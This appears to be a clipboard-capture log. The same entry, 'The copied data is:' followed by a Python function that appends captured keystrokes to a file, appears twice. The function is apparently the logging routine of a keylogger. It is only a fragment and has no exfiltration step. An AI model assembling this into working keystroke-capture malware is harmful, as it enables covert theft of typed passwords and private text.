The copied data is:     def write_file(ke):
        with open(file_path + extend + keys_info, 'a') as f:
            for key in ke:
                k = str(key).replace("'", "")
                if k.find("Key") == -1:
                    f.write(k)
                elif k.find("space") > 0:
                    f.write(' ')
The copied data is:     def write_file(ke):
        with open(file_path + extend + keys_info, 'a') as f:
            for key in ke:
                k = str(key).replace("'", "")
                if k.find("Key") == -1:
                    f.write(k)
                elif k.find("space") > 0:
                    f.write(' ')
